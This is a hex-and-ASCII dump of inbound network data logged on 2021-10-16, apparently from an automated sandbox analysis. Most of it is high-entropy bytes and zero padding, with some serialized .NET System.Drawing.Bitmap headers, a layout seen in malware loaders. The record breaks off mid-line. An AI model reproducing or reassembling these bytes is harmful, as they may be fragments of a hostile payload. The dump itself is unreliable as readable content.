2021-10-16 14:53:37 UTC	1589	IN	Data Raw: db 76 51 10 ac 5b e2 7a ec 8f 55 10 db a6 b9 0a 20 ff 60 4b cb b9 aa 94 fd d3 be d5 c9 7d a8 40 e6 d6 6e 17 84 4d 81 e8 8f 20 90 cd 70 51 1a ea d5 df b0 22 a2 3e 6a 28 6b 2d 09 59 c7 d7 b8 82 92 92 6f 65 4c 21 f5 b9 a9 63 b8 ee 22 03 1c d6 07 b2 62 7b 15 22 34 07 42 3d 6e f9 cf 66 9d 6c 2f e3 62 90 a0 2f ea c1 69 c1 12 44 ca ea d8 39 92 40 9c 89 b5 ce 75 c3 61 fc a7 5b 29 fa b6 f3 ef 3c 47 88 ca ef 7a af 11 5f ad f1 fc 6e 7a db ec b4 3c 55 60 15 70 96 e7 08 1e 79 db 21 e1 60 cb 6c 95 ee 4d ad bd 86 3e bc ff a1 05 cb 49 c0 d8 f2 f3 e8 6a d1 c0 ba b2 6f 85 61 98 08 42 1c c0 b7 f7 f8 9e 60 85 33 bf f1 94 e8 7c 8a a2 e2 16 27 bd 4f cd b2 c3 e5 3a d9 1c 21 bd 0a 84 27 3c 28 00 5f 58 22 c9 47 3b 28 95 3a b7 3a e4 c3 01 45 e3 ea 9d de 15 07 0b 5d 6b 5e c6 a1 71 Data Ascii: vQ[zU `K}@nM pQ">j(k-YoeL!c"b{"4B=nfl/b/iD9@ua[)<Gz_nz<U`py!`lM>IjoaB`3\|'O:!'<(_X"G;(::E]k^q
2021-10-16 14:53:37 UTC	1605	IN	Data Raw: 75 a3 1c 2b 67 b6 a4 54 d9 86 74 63 a6 f5 9b cb bc 21 af 7e 46 3a e2 96 e5 18 67 ee a1 2d 44 9c 9a 44 37 b2 64 ba 39 a3 90 8a e0 a5 43 80 04 d7 be 62 08 ea 0d 65 b1 73 c4 95 54 6b 0b 08 c7 b0 97 10 c1 cf cb 66 6c a4 eb 5c cb 3d 40 70 34 13 51 c4 64 ac db 45 91 11 3f 7b 65 5d 3f 6d b1 59 04 62 88 1f f4 92 ea 08 e5 79 75 f0 81 45 22 7a c5 a3 dd e2 fb 13 df 88 27 ef 7f 6d a4 01 06 51 52 f9 ba 63 e1 ac 80 3b e7 33 2f f2 7c a3 b9 9d e7 58 6f 74 59 07 29 06 5a 0b c9 60 c8 1b f9 b4 f9 67 e9 be 01 ac d0 57 57 f5 48 b0 37 e7 4b bb 93 5f 32 30 d8 84 82 79 13 7b e9 a6 d2 d9 13 18 7f 0b 4d 52 4b 2a a5 00 53 2c e4 1c e3 80 e7 64 5f 41 73 4c 9b a5 c1 0d bc 18 5e b6 02 e5 9a 5c 44 9b 6a 43 a2 89 57 cc b5 07 97 4a 0e 11 4e e1 e4 7a a6 66 e1 cc 8c cf dd 1c e2 c1 36 ff ea Data Ascii: u+gTtc!~F:g-DD7d9CbesTkfl\=@p4QdE?{e]?mYbyuE"z'mQRc;3/\|XotY)Z`gWWH7K_20y{MRK*S,d_AsL^\DjCWJNzf6
2021-10-16 14:53:37 UTC	1621	IN	Data Raw: b2 54 d0 7e 45 24 4b fc 88 38 0d d7 49 8c 49 4c 6e 37 1e 36 1c a6 97 37 18 f6 7c ec 84 aa 1e 6d ed 0d 73 69 fd 95 08 fa db a1 a0 50 07 db 6c 0e db 57 29 68 b3 1a 51 94 29 84 52 0d b9 2f 3f 43 6a 5f 38 6f d5 23 ca 21 14 e9 0f 1d 35 cb 61 2a e9 fc 28 c1 0b 5a b3 e1 c0 50 1f 9d 4f 5f 52 10 f5 4d a0 68 8c e0 5b d0 a1 10 58 ed 1c 82 ee 9c 01 7d d1 bb 4b e1 07 f5 2d 66 fd b2 0e 4b e8 1b b1 8b 4b 6c 4b 6f 65 f7 8e 89 a2 ea 2e e9 4b 79 f2 53 f6 67 ad 93 bb 66 be a2 b3 39 5d aa 96 c2 28 9b ee 11 df 5b 29 b0 7f e9 75 db 02 49 27 0d f2 86 4d f6 e4 0c 91 39 28 06 d6 c5 7c 32 b6 b4 13 42 a6 f7 60 65 e2 eb 43 6a f8 b3 60 70 86 26 d6 ff d9 b9 1a c2 fd 99 86 16 89 64 2e 81 95 6e 9f d9 87 90 94 e5 e5 13 38 54 34 87 82 d2 76 21 2e 08 2c 8f dd 7c 39 91 f6 e0 af 70 ee f2 47 Data Ascii: T~E$K8IILn767\|msiPlW)hQ)R/?Cj_8o#!5a*(ZPO_RMh[X}K-fKKlKoe.KySgf9]([)uI'M9(\|2B`eCj`p&d.n8T4v!.,\|9pG
2021-10-16 14:53:37 UTC	1637	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1653	IN	Data Raw: 1b 81 16 54 bb 2a 02 8a aa 3c ed ea 8f 40 c9 e9 14 cb 2d 38 cf 87 31 07 04 25 9f f4 11 a1 68 4a 05 b8 5b 09 31 38 42 c1 c9 2f 5f 2c 68 82 57 7d e4 9e 9e 29 74 d2 d4 3e ab e8 e4 18 66 60 a5 1e e6 2f af bc cd f2 21 b5 39 a9 3b 62 f2 6f 8f 0f c2 71 08 ec 44 de 0b 29 62 27 44 bb f4 7f 6a b2 36 3d 23 d0 48 5c 8d fc bc 9a d1 d9 bd a0 1a d6 4a ab 5c df 65 72 67 85 2e 56 7a ae 43 3e 33 98 d4 be b8 59 48 29 ad 51 9b f6 51 c9 b7 be c9 d6 b7 1f a3 30 18 1c f8 dd 33 64 aa fa e5 02 aa 08 da 78 cd 03 30 44 33 bd d1 c7 52 64 fa 30 59 4b 0b d1 12 5e 14 01 e2 4b 86 66 4a 6f 25 3b cd 89 d4 e5 d6 c5 92 d9 b0 0b 9a c5 e2 38 04 ec 07 e9 9a b8 c4 2a 61 51 51 99 ac 32 0a 5e 56 e7 06 cd 56 d4 87 d5 f8 98 1b 86 1b b3 9f c7 15 4b 1c 94 8f bb 49 c1 10 3f 78 bf 2f 5e e2 a3 04 57 7b Data Ascii: T<@-81%hJ[18B/_,hW})t>f`/!9;boqD)b'Dj6=#H\J\erg.VzC>3YH)QQ03dx0D3Rd0YK^KfJo%;8aQQ2^VVKI?x/^W{
2021-10-16 14:53:37 UTC	1669	IN	Data Raw: 8b de e4 57 9e 00 7b ac f6 47 cc 83 67 13 b0 4f f6 e0 0d 98 34 ec fd d8 f0 e3 73 e5 56 4d c7 c8 42 a9 d8 21 e9 74 37 d7 0f 24 33 67 27 ad fa 92 98 2d d7 70 fa 38 fc ef 88 7c cf e9 2f 41 cb 02 10 00 c1 24 e2 28 c1 9e 05 86 a9 29 e2 be 53 1f 16 8b 60 ef 72 be 05 e9 62 0d e7 59 96 d3 59 10 34 ea 2a c1 0a bb 85 33 b4 d2 bb cd 02 a0 98 d7 94 0c 5d 44 c7 3a 8d 20 c2 b7 a2 ea b1 b8 bb 6a b1 23 22 48 5d b9 0e 04 75 d1 64 a6 69 be 46 1a 46 6d 5b 17 25 01 01 7f 52 23 0a 85 ea 6f 50 6f 7f 92 ac 49 c1 e6 73 c0 1d c4 c0 78 a3 22 7f 54 04 99 39 c4 7e 5d bd 8b 06 86 d9 7f 2b 43 3f e3 6e ed 10 32 92 bb 19 bf bb 71 c1 3f 80 ef 5f e3 6e b5 fc 93 b4 1d 24 43 3d eb 65 60 18 92 81 64 ed 20 93 c9 36 48 c8 89 50 bf f9 e6 04 2f 38 74 0e d2 ad 98 99 86 3f 87 d1 26 3d 24 32 6a b8 Data Ascii: W{GgO4sVMB!t7$3g'-p8\|/A$()S`rbYY4*3]D: j#"H]udiFFm[%R#oPoIsx"T9~]+C?n2q?_n$C=e`d 6HP/8t?&=$2j
2021-10-16 14:53:37 UTC	1685	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1701	IN	Data Raw: 00 73 5e 3e e7 74 f7 6f 3f b5 77 5b 64 8e e5 41 39 ea 89 03 fc d1 fd 96 a9 5b f1 d5 99 97 3b 99 55 cf 6d 07 72 23 70 90 17 5d fc cb 48 b9 72 07 28 55 9f 0f 4a 65 01 a0 0d 0f 00 00 00 00 35 77 88 ac 97 2a c6 b0 6a 29 61 4b a8 91 96 2e 0b 15 b7 3c 86 80 46 20 53 d0 66 ed f2 c6 1a f5 f3 20 5b eb 95 09 fa 4e db 36 9f e3 0e 7e 6d 0e f2 fd 35 19 d1 8b 18 3c 36 80 d0 45 21 1c 7b 8f 76 f8 c0 7d 36 e4 c3 36 d1 d7 d1 d4 57 d1 5a 58 bf b2 15 0e 55 47 3a b9 85 f5 11 ff c4 5d dc c6 83 8b 49 ac 2a a1 64 57 4a a5 fd e2 da bb 3c f7 7c 8a 8c cf 42 93 84 21 8c bd 69 5d 83 44 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e Data Ascii: s^>to?w[dA9[;Umr#p]Hr(UJe5wj)aK.<F Sf [N6~m5<6E!{v}66WZXUG:]IdWJ<\|B!i]D@QSystem.Drawing, Version=4.0.0.0, Culture=n
2021-10-16 14:53:37 UTC	1717	IN	Data Raw: 4d c9 87 f3 d2 58 99 4f c5 bf a4 75 e0 02 86 dc f5 b6 29 a0 31 d1 23 81 5b d2 c1 ba c7 98 b5 9a 1b fb a9 bc 9b f0 1a aa 95 5f e2 5f d3 16 92 59 b8 cd e1 ab 33 d3 a7 1e 58 c6 bc 74 c5 e4 90 13 9b da 79 d3 77 5b 72 5a 15 21 63 48 d7 c7 b9 89 6b 9a 1c 94 da d6 f1 8d b5 b7 81 fd 2f 46 5d af c5 a6 b8 3f 78 4d 85 23 f8 4e 85 74 a4 a4 24 98 af 47 5f cb 2c 03 d0 c9 b9 34 b6 0b cc 6c e8 ba b0 c2 cb 87 e1 78 ba 9a 64 f2 b3 f5 1c b0 38 e2 8b d0 1c 91 12 04 f0 00 cc 12 14 18 5c ac 21 25 ec 06 68 e7 ad 8f 51 74 f5 3d 5a 7a 5e 1a cc 27 bf 19 dc b6 46 31 7c c9 bc 27 c3 0b ad c9 3c 9a be dd c5 b7 6f 3f 1c 42 d2 11 8e 8b 4a b1 d1 cc 3b de 03 09 5d bf 2b 01 c9 9c 39 f9 89 3a b8 ca 0a 2e 80 b5 55 27 9e 57 c4 cb cc 16 9a 96 d4 e6 37 0d 4a 04 c8 72 06 cf 39 38 4d 04 9a a7 43 Data Ascii: MXOu)1#[__Y3Xtyw[rZ!cHk/F]?xM#Nt$G_,4lxd8\!%hQt=Zz^'F1\|'<o?BJ;]+9:.U'W7Jr98MC
2021-10-16 14:53:37 UTC	1733	IN	Data Raw: 97 65 a8 e7 22 9b 1b 6b 94 cd 30 66 d2 eb 63 a9 cb 89 96 6e 56 1f 00 b0 68 5a 39 04 bb 5f e2 ec 67 4b 2b 2b f3 17 3f d1 c2 0d e6 7e ba a0 0c 27 88 44 c2 05 89 93 51 7f 0d 29 66 e3 c1 1d 11 03 08 78 71 7c 90 eb a7 b5 a3 28 8e 49 40 97 ca fd f1 0f ae c3 b0 2f 85 b0 c3 ef 7c 11 6b 65 bf c5 8b 71 c7 6b 1d 5c 5d f7 23 5d 42 ff 52 68 15 b0 33 f6 ce 5f 6f 2b 29 22 ba 05 f4 f1 b6 d5 2c d9 54 38 24 5e a9 c3 9f d0 2f 30 f2 77 a6 c6 a9 16 c1 7d a9 b9 6a f4 62 d0 68 e1 bb 0e 0d 3d 33 53 19 48 ff 5f 83 b6 4d 99 ea da 3e 46 da e6 59 6e b3 66 4d 08 98 d2 12 95 5c 41 3b 11 8f cf f0 8d ce 5d 90 ab 50 27 0d 89 ef d2 db ab 33 40 ec b7 81 06 74 3e 20 83 52 42 ec 83 4f e6 6d 9c ca 3c 62 80 f8 7d ec 42 da 07 cc d2 14 d9 2d 94 be c3 c5 7f e5 75 aa 97 cf 70 dd 93 8d 23 5c a8 0f Data Ascii: e"k0fcnVhZ9_gK++?~'DQ)fxq\|(I@/\|keqk\]#]BRh3_o+)",T8$^/0w}jbh=3SH_M>FYnfM\A;]P'3@t> RBOm<b}B-up#\
2021-10-16 14:53:37 UTC	1749	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1765	IN	Data Raw: 4a 9b 51 7c 5e 7a 09 ca 11 bb 90 8b 75 58 3a 69 9b e2 4e 1b f8 95 10 f3 e1 a8 d0 f2 d7 fe d4 1a 50 e3 d1 2b 78 35 be b5 cf fb 00 92 5f 0c 2a ca 9a 0d 47 2d c8 c0 a5 f3 dc 0e 01 77 22 8f cd 8a 6c 1d e9 b0 ae c8 dd eb 38 1f 5e e6 c2 aa 37 fc a6 bf 78 95 51 e0 12 b6 77 7e 61 00 a8 a3 6e 46 0e de c3 6b f4 cf 69 0a 72 93 fc 60 df fd da 28 5b 9d a8 e6 30 dd bd 16 aa ce ce e3 da ae 36 c4 8a 0a 28 9d 5a d7 f8 3a bd 68 08 71 40 66 12 12 86 2f 51 47 c8 a8 bf 5f f7 8d 25 13 c3 57 8e 8d d4 c8 76 38 90 ae 22 82 ca a9 eb ef 72 1d f3 12 b9 dc 15 86 5b 9a 90 e6 d8 f0 85 f8 7e 10 8b 76 7b c1 fa b4 af e1 ae cd be 11 e5 ef 69 cf 2a 99 0d d1 40 34 a5 09 16 75 68 a0 02 91 74 d5 35 fa 53 b7 b2 86 52 5f 4e 9f c3 ad b1 5d e8 d2 f5 8e 41 d8 6e 26 9d 7d fa c8 ed b2 70 4f ea 04 4d Data Ascii: JQ\|^zuX:iNP+x5_G-w"l8^7xQw~anFkir`([06(Z:hq@f/QG_%Wv8"r[~v{i@4uht5SR_N]An&}pOM
2021-10-16 14:53:37 UTC	1781	IN	Data Raw: 6f 24 f5 d1 55 b1 67 b4 98 d8 2c 99 64 f9 ce c4 6f c6 b5 ef 58 f3 d6 c2 b9 05 04 3c 87 13 cf 89 5c 8e de 36 f0 3d 2d d4 ab f6 49 83 da 4c ae 46 65 7d e6 6d a1 09 20 63 dd d4 e4 ea 5a 25 eb 79 7b c3 b5 b3 6d 96 18 cc 8b 7e 99 b3 aa 55 09 be 53 51 64 66 00 e9 10 09 ab 2e 57 0a c1 21 20 b6 9b 7f 1d 31 41 41 d8 f3 d2 e5 fc 12 bd a5 0b 52 d4 a6 83 eb e8 89 fa 35 3b dc d5 8e 60 2b 69 d7 c5 5c 83 6b 98 e1 c9 0d 89 53 39 fd e3 57 d6 76 fc 25 d2 1c 2c e0 3b 7a 0d 38 f6 2f 62 4c 5c 0d c9 8e 05 e3 43 78 77 33 42 95 cd d8 95 43 6a ea b9 d0 55 0a 17 14 bb a6 69 7d 6a 34 3b b7 6f 7d 56 0c cf ae 1d 42 57 83 ed 89 3a 2d 88 00 26 12 4c 10 06 0a 06 d1 c9 a6 cd 11 de 8b 7b 5a 64 ff ca 2e a8 40 84 d8 85 94 ec 61 4b 0d 7c c8 56 4c 37 19 c0 2d bc b9 24 b7 bf 3f 68 40 c8 30 eb Data Ascii: o$Ug,doX<\6=-ILFe}m cZ%y{m~USQdf.W! 1AAR5;`+i\kS9Wv%,;z8/bL\Cxw3BCjUi}j4;o}VBW:-&L{Zd.@aK\|VL7-$?h@0
2021-10-16 14:53:37 UTC	1797	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1813	IN	Data Raw: 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:37 UTC	1829	IN	Data Raw: 33 3a 44 84 3a 4b 43 91 14 94 50 88 9c cb b6 ce f6 f5 57 f1 1b c2 da ab 3f a0 01 57 09 3e 38 e5 98 db d1 6f f3 a1 97 ed b3 c0 27 ac 72 49 ea 7d f4 ac c7 be 29 79 92 26 63 c5 f2 9f 1d 25 9e 6b 8c 5b 1d 86 37 a4 80 65 f1 fc 5f 80 ff 2d 14 8b 77 fb 8f 33 5e 2f cb 3e 50 7a 5e 17 42 d5 ad cf 79 63 1a 98 c2 be 31 7c df c1 68 3a 42 48 0d ee c8 4f 6b 15 15 7a cb f0 b1 55 7b 8f af 03 d8 86 f1 41 e2 e6 db ff ac e5 a4 81 83 8c 3d 3d 7b 5d bf 64 41 9c cc d7 94 e1 c6 63 44 22 88 2d 05 3c 89 bc d3 e8 bf 27 1f 44 8a 7d f9 25 b7 f5 99 4d 6f 9e 86 3e f4 e9 58 2f 71 8e 58 9e 8a d4 80 3b 8d fb f5 4d aa c7 2f 7c 56 99 62 01 55 12 d2 8c 2f a3 87 5e ec d8 30 81 ee a0 c2 fd 91 24 8b 30 43 35 a0 2c 58 a3 94 3b f6 95 bc e7 92 25 17 3f e9 39 58 ee 70 02 eb 3a 9d 01 2c 51 ef bb a5 Data Ascii: 3:D:KCPW?W>8o'rI})y&c%k[7e_-w3^/>Pz^Byc1\|h:BHOkzU{A=={]dAcD"-<'D}%Mo>X/qX;M/\|VbU/^0$0C5,X;%?9Xp:,Q
2021-10-16 14:53:37 UTC	1845	IN	Data Raw: 45 ee 80 bb b7 b5 6b 85 52 f7 27 b1 c2 a0 0b 63 81 56 b1 5a e1 47 df b5 d8 1f c2 7c a6 48 e8 1d a4 25 0c 0b 54 85 d5 b0 42 5a e0 b1 f7 26 54 22 f6 73 cf 7b b0 d8 b6 16 cd a0 62 2b 7d 17 e2 82 f1 f5 6e 11 ef 72 dd 78 24 ad 67 10 43 27 c0 9f 27 66 f1 68 f9 4e 9b 4a 38 0d 34 b0 3a 1f 46 8d 7f a4 1f cd ac ee a3 20 9a a9 81 b9 90 6c bc 30 7d 8a 94 81 87 90 18 e6 11 5d 23 7b 80 85 ad c3 9f 71 78 db 07 91 e7 b6 81 eb 8f 08 ee e3 52 9a 8b 36 d5 e3 d2 1e 54 d1 2a 04 f4 c1 7c 96 c5 90 b5 c0 3e ac 49 6f 99 f8 d8 06 95 c0 6a bf f7 f3 a7 34 ca 82 44 9c 6e 67 e5 c6 ca f2 9b c9 20 79 41 f6 93 3d 8e b3 39 64 9c 7e fd 0c 1e 59 65 fa 8f 09 89 c0 49 d5 86 54 94 83 c7 d7 c8 ff d7 c8 f4 d2 f5 b8 5b d8 b5 07 94 5a cd a4 09 1a 1c f9 04 c4 eb 82 7b 0d 18 cd ee fb db f2 51 f3 87 Data Ascii: EkR'cVZG\|H%TBZ&T"s{b+}nrx$gC''fhNJ84:F l0}]#{qxR6T*\|>Ioj4Dng yA=9d~YeIT[Z{Q
2021-10-16 14:53:37 UTC	1861	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1877	IN	Data Raw: 5f 7f bb 2c 81 fd 1a f6 6c 4f 6f 80 bd 81 1a d5 bd 17 c8 c8 15 ca e9 4e f9 ac bd 14 12 cc 13 8e 68 d7 0f 42 f2 ac 6e 48 81 b4 76 a4 40 a6 0b 35 da 60 9f 21 8e 4e 53 7b 3b 6f 5b e4 ac ac 9e 62 45 ff 74 8c c4 97 67 a3 e7 90 45 53 1b 0d 47 30 04 12 24 4a df 75 75 99 e9 87 9f 9a e0 e3 c0 f4 f0 3a 79 60 19 18 98 77 d2 51 d5 63 fc 45 f3 2a 12 c5 c4 da f2 82 81 45 26 cd 34 e3 fc bb 0b 9c 89 ff ff 19 8e 1a 26 ba 87 0c 24 7d 24 78 67 6a 04 07 cf 2c 1e 1b 2b c8 e9 5f 3e 72 fe a7 45 88 b3 fb 35 4b d6 af 8c 2c fc 6a 9c 9c 7c ca ae 3f 62 aa 4d 35 ff f8 60 2f 5b 4b 85 8a f0 59 81 06 fd f5 df de c4 06 84 b3 db 75 6a b4 26 9b 7e 71 8c e8 b3 e2 75 ac b5 68 0e 65 0f d7 00 33 2f 17 e1 6d 68 46 f2 40 53 11 28 02 4b 5b 32 3f ab 96 ac 11 aa 82 55 ca db cb 98 6f a9 6d 5b bc 53 Data Ascii: _,lOoNhBnHv@5`!NS{;o[bEtgESG0$Juu:y`wQcE*E&4&$}$xgj,+_>rE5K,j\|?bM5`/[KYuj&~quhe3/mhF@S(K[2?Uom[S
2021-10-16 14:53:37 UTC	1893	IN	Data Raw: f3 a0 14 a0 6f 7a 5a 0b ef c2 9c 92 6f ee 0a e8 55 38 73 7d 20 8d f2 b7 3f 7c 6a c1 5a d0 ed 56 b2 78 3e a8 6e 25 02 09 41 72 19 68 40 a8 05 a9 5f a5 31 a7 11 3e 33 79 9f e9 4b 79 dc 56 61 e7 55 8b 80 2d f4 1d 27 f9 0e 91 ae 4d 1a a0 31 db 23 53 20 e8 1e cd 2b 43 9e 2f ec 30 6d 8a 72 d2 b2 ed 99 52 dd e7 13 e2 4a 97 16 cf 68 4e af 0d 05 d1 27 f0 2b 23 ae 73 40 59 9f dd b3 e9 6a d6 02 2a ca be a3 58 d1 ee c8 98 b7 d6 cf 12 5b b9 9d c1 6c f3 c0 bd 6d 37 23 61 bb d5 7c 39 f3 07 8c 97 da 68 e5 e9 66 ed 74 3a 7a 05 7f 5f 00 69 7f 21 7d c9 0f d0 5b 88 01 12 2d 3d 91 64 b0 11 63 3a 4c de c7 d2 68 79 74 55 99 f4 44 4b fb cc 72 bf 72 06 28 e0 34 9e bc e1 8a 65 d1 65 50 07 42 ce c0 19 6c 54 9e 82 a0 b7 c3 b3 aa 2e 38 c8 f6 91 9e 75 25 f0 39 86 8b d7 77 60 47 50 cd Data Ascii: ozZoU8s} ?\|jZVx>n%Arh@_1>3yKyVaU-'M1#S +C/0mrRJhN'+#s@Yj*X[lm7#a\|9hft:z_i!}[-=dc:LhytUDKrr(4eePBlT.8u%9w`GP
2021-10-16 14:53:37 UTC	1909	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f5 51 7e 8a 26 e5 c4 ca cc ad 8b 02 df 8f f5 2d 0e c6 4d c7 42 65 25 ba 53 cf 42 c3 cd df 52 53 36 3b e7 29 ab 3c 8e c0 bb 8c bd de 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (Q~&-MBe%SBRS6;)<
2021-10-16 14:53:37 UTC	1925	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 